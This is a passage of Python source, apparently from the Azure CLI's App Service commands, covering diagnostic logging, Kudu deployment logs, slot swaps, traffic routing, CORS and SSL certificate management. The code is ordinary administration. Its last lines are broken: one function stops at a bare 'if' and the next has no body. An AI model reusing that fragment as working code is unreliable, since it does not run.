    site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
    ssl_host = next((h for h in site.host_name_ssl_states
                     if h.ssl_state != SslState.disabled), None)
    return ('https' if ssl_host else 'http') + '://' + url


# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
                       application_logging=None, web_server_logging=None,
                       docker_container_logging=None, detailed_error_messages=None,
                       failed_request_tracing=None, slot=None):
    """Configure application/web-server logging, detailed errors and failed-request tracing."""
    from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
                                       AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
                                       HttpLogsConfig, FileSystemHttpLogsConfig, EnabledConfig)
    client = web_client_factory(cmd.cli_ctx)
    # TODO: ensure we call get_site only once
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    location = site.location

    application_logs = None
    if application_logging:
        fs_log = None
        blob_log = None
        # 'off' forces level False; otherwise default the level to True when unset
        level = level if application_logging != 'off' else False
        level = True if level is None else level
        if application_logging in ['filesystem', 'off']:
            fs_log = FileSystemApplicationLogsConfig(level=level)
        if application_logging in ['azureblobstorage', 'off']:
            blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
                                                             sas_url=None)
        application_logs = ApplicationLogsConfig(file_system=fs_log,
                                                 azure_blob_storage=blob_log)

    http_logs = None
    server_logging_option = web_server_logging or docker_container_logging
    if server_logging_option:
        # TODO: az blob storage log config currently not in use, will be implemented later.
        # Tracked as Issue: #4764 on Github
        filesystem_log_config = None
        turned_on = server_logging_option != 'off'
        if server_logging_option in ['filesystem', 'off']:
            # 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
            filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100,
                                                             retention_in_days=3,
                                                             enabled=turned_on)
        http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)

    detailed_error_messages_logs = (None if detailed_error_messages is None
                                    else EnabledConfig(enabled=detailed_error_messages))
    failed_request_tracing_logs = (None if failed_request_tracing is None
                                   else EnabledConfig(enabled=failed_request_tracing))
    site_log_config = SiteLogsConfig(location=location,
                                     application_logs=application_logs,
                                     http_logs=http_logs,
                                     failed_requests_tracing=failed_request_tracing_logs,
                                     detailed_error_messages=detailed_error_messages_logs)

    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'update_diagnostic_logs_config', slot, site_log_config)


def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
    """Return the current diagnostic-logs configuration."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_diagnostic_logs_configuration', slot)


def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
    """Fetch the Kudu log for a specific deployment, or the latest one when no id is given."""
    import urllib3
    import requests

    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))

    deployment_log_url = ''
    if deployment_id:
        deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
    else:
        # no id supplied: pick the most recent deployment's log_url
        deployments_url = '{}/api/deployments/'.format(scm_url)
        response = requests.get(deployments_url, headers=headers)

        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployments_url, response.status_code, response.reason))

        sorted_logs = sorted(
            response.json(),
            key=lambda x: x['start_time'],
            reverse=True
        )
        if sorted_logs and sorted_logs[0]:
            deployment_log_url = sorted_logs[0].get('log_url', '')

    if deployment_log_url:
        response = requests.get(deployment_log_url, headers=headers)
        if response.status_code != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                deployment_log_url, response.status_code, response.reason))
        return response.json()
    return []


def list_deployment_logs(cmd, resource_group, name, slot=None):
    """List Kudu deployment entries for an app (empty list when none)."""
    scm_url = _get_scm_url(cmd, resource_group, name, slot)
    deployment_log_url = '{}/api/deployments/'.format(scm_url)
    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)

    import urllib3
    headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))

    import requests
    response = requests.get(deployment_log_url, headers=headers)

    if response.status_code != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            scm_url, response.status_code, response.reason))

    return response.json() or []


def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
    """Enable/disable auto-swap on a slot (target defaults to 'production')."""
    client = web_client_factory(cmd.cli_ctx)
    site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
    site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                   'update_configuration', slot, site_config)


def list_slots(cmd, resource_group_name, webapp):
    """List deployment slots, shortening names and attaching the plan name."""
    client = web_client_factory(cmd.cli_ctx)
    slots = list(client.web_apps.list_slots(resource_group_name, webapp))
    for slot in slots:
        slot.name = slot.name.split('/')[-1]
        setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
        del slot.server_farm_id
    return slots


def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None,
              action='swap'):
    """Swap, preview-swap, or reset a slot swap; target defaults to 'production'."""
    client = web_client_factory(cmd.cli_ctx)
    # Default isPreserveVnet to 'True' if preserve_vnet is 'None'
    isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to Boolean
    isPreserveVnet = bool(isPreserveVnet == 'true')
    CsmSlotEntity = cmd.get_models('CsmSlotEntity')
    slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production',
                                     preserve_vnet=isPreserveVnet)
    if action == 'swap':
        poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
        return poller
    if action == 'preview':
        if slot is None:
            result = client.web_apps.apply_slot_config_to_production(resource_group_name,
                                                                     webapp, slot_swap_entity)
        else:
            result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
                                                                   slot, slot_swap_entity)
        return result
    # we will reset both source slot and target slot
    if target_slot is None:
        client.web_apps.reset_production_slot_config(resource_group_name, webapp)
    else:
        client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
    return None


def delete_slot(cmd, resource_group_name, webapp, slot):
    """Delete a deployment slot."""
    client = web_client_factory(cmd.cli_ctx)
    # TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
    client.web_apps.delete_slot(resource_group_name, webapp, slot)


def set_traffic_routing(cmd, resource_group_name, name, distribution):
    """Set ramp-up (traffic-routing) rules from 'slot=percentage' pairs.

    An empty distribution clears all rules (used by clear_traffic_routing).
    """
    RampUpRule = cmd.get_models('RampUpRule')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(name))
    configs = get_site_configs(cmd, resource_group_name, name)
    host_name_split = site.default_host_name.split('.', 1)
    host_name_suffix = '.' + host_name_split[1]
    host_name_val = host_name_split[0]
    configs.experiments.ramp_up_rules = []
    for r in distribution:
        slot, percentage = r.split('=')
        action_host_name_slot = host_name_val + "-" + slot
        configs.experiments.ramp_up_rules.append(
            RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
                       reroute_percentage=float(percentage),
                       name=slot))
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration',
                            None, configs)

    return configs.experiments.ramp_up_rules


def show_traffic_routing(cmd, resource_group_name, name):
    """Return the current ramp-up rules."""
    configs = get_site_configs(cmd, resource_group_name, name)
    return configs.experiments.ramp_up_rules


def clear_traffic_routing(cmd, resource_group_name, name):
    """Remove all ramp-up rules by setting an empty distribution."""
    set_traffic_routing(cmd, resource_group_name, name, [])


def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the app's CORS allow-list and return the updated settings."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'update_configuration', slot, configs)
    return result.cors


def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove given origins from the CORS allow-list (or clear it when none specified)."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if allowed_origins:
            configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or [])
                                            if x not in allowed_origins]
        else:
            configs.cors.allowed_origins = []
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                          'update_configuration', slot, configs)
    return configs.cors


def show_cors(cmd, resource_group_name, name, slot=None):
    """Return the app's CORS settings."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    return configs.cors


def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream the live log from Kudu on a background thread until interrupted.

    NOTE(review): intentionally loops forever — the daemon thread prints the log and
    the main thread only sleeps so that Ctrl+C can terminate the command.
    """
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))

    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    t.daemon = True
    t.start()

    while True:
        time.sleep(100)  # so that ctrl+c can stop the command


def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the zipped historical logs from Kudu's /dump endpoint."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    url = scm_url.rstrip('/') + '/dump'
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(url, user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)


def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return (username, password) publishing credentials for basic auth against Kudu."""
    creds = _generic_site_operation(cli_ctx, resource_group_name, name,
                                    'begin_list_publishing_credentials', slot)
    creds = creds.result()
    return (creds.publishing_user_name, creds.publishing_password)


def _get_log(url, user_name, password, log_file=None):
    """GET a Kudu log URL; write to log_file when given, otherwise stream lines to the console."""
    import urllib3
    try:
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass

    http = get_pool_manager(url)
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    if r.status != 200:
        raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
            url, r.status, r.reason))
    if log_file:  # download
        with open(log_file, 'wb') as f:
            while True:
                data = r.read(1024)
                if not data:
                    break
                f.write(data)
    else:  # streaming
        std_encoding = sys.stdout.encoding
        for chunk in r.stream():
            if chunk:
                # Extra encode() and decode for stdout which does not support 'utf-8'
                logger.warning(chunk.decode(encoding='utf-8', errors='replace')
                               .encode(std_encoding, errors='replace')
                               .decode(std_encoding, errors='replace')
                               .rstrip('\n\r'))  # each line of log has CRLF.
    r.release_conn()


def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file,
                    slot=None):
    """Upload a .pfx certificate, naming it from its thumbprint/ASE/location/group.

    NOTE(review): cert_file is opened but never closed — consider a with-block.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    cert_file = open(certificate_file, 'rb')
    cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')

    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)


def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
    """Compose the certificate resource name 'thumbprint_ase_location_group'."""
    return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)


def _get_cert(certificate_password, certificate_file):
    '''
    Decrypts the .pfx file
    '''
    # NOTE(review): load_pkcs12 is deprecated in newer pyOpenSSL releases — confirm pinned version
    p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint


def list_ssl_certs(cmd, resource_group_name):
    """List certificates in a resource group."""
    client = web_client_factory(cmd.cli_ctx)
    return client.certificates.list_by_resource_group(resource_group_name)


def show_ssl_cert(cmd, resource_group_name, certificate_name):
    """Show a certificate by name."""
    client = web_client_factory(cmd.cli_ctx)
    return client.certificates.get(resource_group_name, certificate_name)


def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the certificate in the resource group matching the given thumbprint."""
    client = web_client_factory(cmd.cli_ctx)
    webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            return client.certificates.delete(resource_group_name, webapp_cert.name)
    raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))


def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Import a Key Vault certificate (or App Service Certificate) into the webapp's plan.

    Accepts either a vault name in the current subscription or a full vault resource ID.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    server_farm_id = webapp.server_farm_id
    location = webapp.location
    kv_id = None
    if not is_valid_resource_id(key_vault):
        # resolve a bare vault name against the current subscription
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        key_vaults = kv_client.vaults.list_by_subscription()
        for kv in key_vaults:
            if key_vault == kv.name:
                kv_id = kv.id
                break
    else:
        kv_id = key_vault

    if kv_id is None:
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return

    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']

    # If in the public cloud, check if certificate is an app service certificate, in the same
    # or a different subscription
    kv_secret_name = None
    cloud_type = cmd.cli_ctx.cloud.name
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if cloud_type.lower() == PUBLIC_CLOUD.lower():
        if kv_subscription.lower() != subscription_id.lower():
            diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx,
                                                               ResourceType.MGMT_APPSERVICE,
                                                               subscription_id=kv_subscription)
            ascs = diff_subscription_client.app_service_certificate_orders.list()
        else:
            ascs = client.app_service_certificate_orders.list()

        kv_secret_name = None
        for asc in ascs:
            if asc.name == key_vault_certificate_name:
                kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name

    # if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
    if not kv_secret_name:
        kv_secret_name = key_vault_certificate_name

    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
    lnk_msg = 'Find more details here: {}'.format(lnk)
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name,
                                                kv_subscription):
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning(lnk_msg)

    kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
    return client.certificates.create_or_update(name=cert_name,
                                                resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)


def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for a bound custom hostname.

    Falls back to manual polling of the 202 Location header because the backend
    LRO is not supported by the SDK yet (see TODO below).
    """
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text,
                                                                               name,
                                                                               resource_group_name))

    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')

    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name,
                                                          slot_text))

    server_farm_id = webapp.server_farm_id
    location = webapp.location
    easy_cert_def = Certificate(location=location, canonical_name=hostname,
                                server_farm_id=server_farm_id, password='')

    # TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
    try:
        return client.certificates.create_or_update(name=hostname,
                                                    resource_group_name=resource_group_name,
                                                    certificate_envelope=easy_cert_def)
    except Exception as ex:
        poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
        if ex.response.status_code == 202 and poll_url:
            r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
            poll_timeout = time.time() + 60 * 2  # 2 minute timeout

            while r.status_code != 200 and time.time() < poll_timeout:
                time.sleep(5)
                r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)

            if r.status_code == 200:
                try:
                    return r.json()
                except ValueError:
                    return r.text
            logger.warning("Managed Certificate creation in progress. Please use the command "
                           "'az webapp config ssl show -g %s --certificate-name %s' "
                           " to view your certificate once it is created",
                           resource_group_name, hostname)
            return
        raise CLIError(ex)


def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name,
                                         key_vault_subscription):
    """Return True when the Microsoft.Azure.WebSites SP has Secret:Get on the vault.

    Returns False when the vault is in another subscription (cannot be checked here).
    """
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription = get_subscription_id(cmd.cli_ctx)
    # Cannot check if key vault is in another subscription
    if subscription != key_vault_subscription:
        return False
    kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
    vault = kv_client.vaults.get(resource_group_name=resource_group_name,
                                 vault_name=key_vault_name)
    # Check for Microsoft.Azure.WebSites app registration
    AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
    AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
                for perm in policy.permissions.secrets:
                    if perm == "Get":
                        return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False


def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """PATCH a single host name's SSL state/thumbprint via a partial Site update."""
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
                                                                 ssl_state=ssl_state,
                                                                 thumbprint=thumbprint,
                                                                 to_update=True)],
                          location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                   'begin_create_or_update', slot, updated_webapp)


def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type,
                        slot=None):
    """Bind/unbind a certificate: search the plan's group then the app's group, then update
    the SSL state of every webapp hostname the certificate covers (wildcards included)."""
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise ResourceNotFoundError("'{}' app doesn't exist".format(name))

    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)

    found_cert = None
    for webapp_cert in webapp_certs:
        if webapp_cert.thumbprint == certificate_thumbprint:
            found_cert = webapp_cert
    if not found_cert:
        # fall back to the app's own resource group
        webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
        for webapp_cert in webapp_certs:
            if webapp_cert.thumbprint == certificate_thumbprint:
                found_cert = webapp_cert
    if found_cert:
        if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               found_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)

        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
        for h in to_update:
            _update_host_name_ssl_state(cmd, resource_group_name, name, webapp, h,
                                        ssl_type, certificate_thumbprint, slot)

        return show_webapp(cmd, resource_group_name, name, slot)

    raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(
        certificate_thumbprint))


def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind a certificate using SNI or IP-based SSL."""
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
                               SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled,
                               slot)


def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Unbind a certificate by disabling SSL for its host names."""
    SslState = cmd.get_models('SslState')
    return _update_ssl_binding(cmd, resource_group_name, name,
                               certificate_thumbprint, SslState.disabled, slot)


def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
    """Return webapp host names covered by the cert's names (wildcards match by suffix)."""
    # the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
    matched = set()
    for hostname in hostnames_from_cert:
        if hostname.startswith('*'):
            for h in hostnames_in_webapp:
                if hostname[hostname.find('.'):] == h[h.find('.'):]:
                    matched.add(h)
        elif hostname in hostnames_in_webapp:
            matched.add(hostname)
    return matched


# helper class that handles runtime stacks in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:

    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux
        self._stacks = []  # lazily populated by _load_stacks_hardcoded / _load_stacks

    @staticmethod
    def remove_delimiters(runtime):
        """Normalize a runtime string to the canonical '|' delimiter."""
        import re
        # delimiters allowed: '|', ':'
        if '|' in runtime:
            runtime = re.split('[|]', runtime)
        elif ':' in runtime:
            runtime = re.split('[:]', runtime)
        else:
            runtime = [runtime]
        return '|'.join(filter(None, runtime))

    def resolve(self, display_name):
        """Case-insensitive lookup of a stack by display name; None when absent."""
        self._load_stacks_hardcoded()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)

    @property
    def stacks(self):
        self._load_stacks_hardcoded()
        return self._stacks

    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Apply a stack's config key/values directly onto the SiteConfig object."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config

    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Apply a stack's config key/values as app settings (used for node stacks)."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []

        for k, v in stack['configs'].items():
            already_in_appsettings = False
            for app_setting in site_config.app_settings:
                if app_setting.name == k:
                    already_in_appsettings = True
                    app_setting.value = v
            if not already_in_appsettings:
                site_config.app_settings.append(NameValuePair(name=k, value=v))
        return site_config

    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled RUNTIME_STACKS JSON file (idempotent)."""
        if self._stacks:
            return
        result = []
        if self._linux:
            result = get_file_json(RUNTIME_STACKS)['linux']
            for r in result:
                r['setter'] = _StackRuntimeHelper.update_site_config
        else:  # Windows stacks
            result = get_file_json(RUNTIME_STACKS)['windows']
            for r in result:
                # node settings are applied as app settings, everything else as site config
                r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                               r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result

    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # Stacks API is updated with Antares deployments,
    # which are infrequent and don't line up with stacks EOL schedule.
    def _load_stacks(self):
        """Populate self._stacks from the live provider stacks API (idempotent)."""
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or [])
                                          if m['isDefault']), None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }

            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or [])
                                          if m['isDefault']), None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })

            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })

        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result


def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    appinsights = appinsights_client.components.get(resource_group, name)
    if appinsights is None or appinsights.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(
            name, resource_group))
    return appinsights.instrumentation_key


def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None,
                                        location=None, tags=None):
    """Create a function-app plan; --max-burst requires the Elastic Premium tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)
    client = web_client_factory(cmd.cli_ctx)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)


# NOTE: definition continues beyond this chunk boundary
def is_plan_consumption(cmd, plan_info):
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if
def is_plan_elastic_premium(cmd, plan_info):
